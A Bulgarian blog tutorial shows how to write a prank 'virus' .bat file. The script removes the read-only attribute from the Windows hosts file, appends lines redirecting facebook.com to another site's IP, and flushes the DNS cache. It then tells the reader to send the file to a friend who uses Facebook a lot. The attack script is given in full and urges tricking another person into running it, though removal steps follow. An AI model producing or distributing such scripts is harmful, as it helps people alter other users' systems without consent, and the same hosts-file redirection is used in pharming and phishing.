Как да си направим прост вирус „инфектиращ“ hosts файла на Windows 7 и Vista

Е вирус, колко да е вирус става да се позабавлявате с някой приятел който много посещава facebook примерно.

Всеки който се е занимавал с компютърни мрежи знае, че когато напише facebook.com в браузъра си, компютърът му се свързва с DNS сървъра, за да разбере IP-то на сайта(в случая facebook.com). Тази процедура се нарича resolving на IP-та. Можете и вие да пробвате като отворите cmd(Start>cmd в полето за търсене и enter). В изскочилия черен прозорец напишете “ping facebook.com” и натиснете Enter. Трябва да видите нещо подобно:

Тук 69.63.181.12 e IP адреса на facebook. Ние ще направим така, че при написване в браузъра на „facebook.com“ ще води към IP-то на друг сайт и няма да може да се отвори социалната мрежа. Преди компютъра да се допита до DNS сървъра той претърсва така наречения hosts файл. Ние ще добавим запис в него с помощта на .bat файл. Bat файловете представляват изпълними файлове с инструкции към командния интерпретатор на операционната система. Стига толкова теория, ето как да създадем така наречения вирус.:

1. Първо трябва да изберем IP-то към което ще пренасочваме сайта. В случая ще направя така, че при отваряне на facebook.com ще се отваря vbox7.com. За да разберете IP-то на vbox7 отворете cmd както направихме преди и напишете “ping vbox7.com”. Оттук се вижда, че IP-то е 87.121.59.2 .

2. Отворете Notepad. Там напишете тези редове:

attrib -r C:\Windows\System32\drivers\etc\hosts

echo 87.121.59.2                   facebook.com >> C:\Windows\System32\drivers\etc\hosts

echo 87.121.59.2                   www.facebook.com >> C:\Windows\System32\drivers\etc\hosts

ipconfig /flushdns

 

Първия ред премахва атрибута „read only“ на hosts файла, за да можем да пишем в него. Втория и третия ред добавят „87.121.59.2                facebook.com“ и  „87.121.59.2                    www.facebook.com“ във hosts файла. Така при написване на facebook.com браузъра ще ни пренасочва не към IP-то на facebook, а към IP-то на vbox. В последния ред командата изчиства кеша на компютъра(необходимо е ако сайта е бил отварян скоро, защото след като веднъж се разбере IP-то на даден сайт от DNS сървъра, компютъра си го записва/кешира).

3. Сега изберете File>Save As… Под Save as type: изберете All files (*.*) и за име изберете някакво завършващо с разширение .bat.

4. Вече можете да пратите файла на някой. Ако той се хване на този плосък номер, вече няма да може да отвори facebook.

Ако го стартирате на вашия компютър, за да си върнете достъпа до социалната мрежа отворете  C:\Windows\System32\drivers\etc в windows explorer и кликнете 2 пъти на файла hosts от появилия се прозорец изберете Notepad. Изтрийте редовете, където пише facebook.com и www.facebook.com.

Тук можете да свалите и примерния virus.bat файл.

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *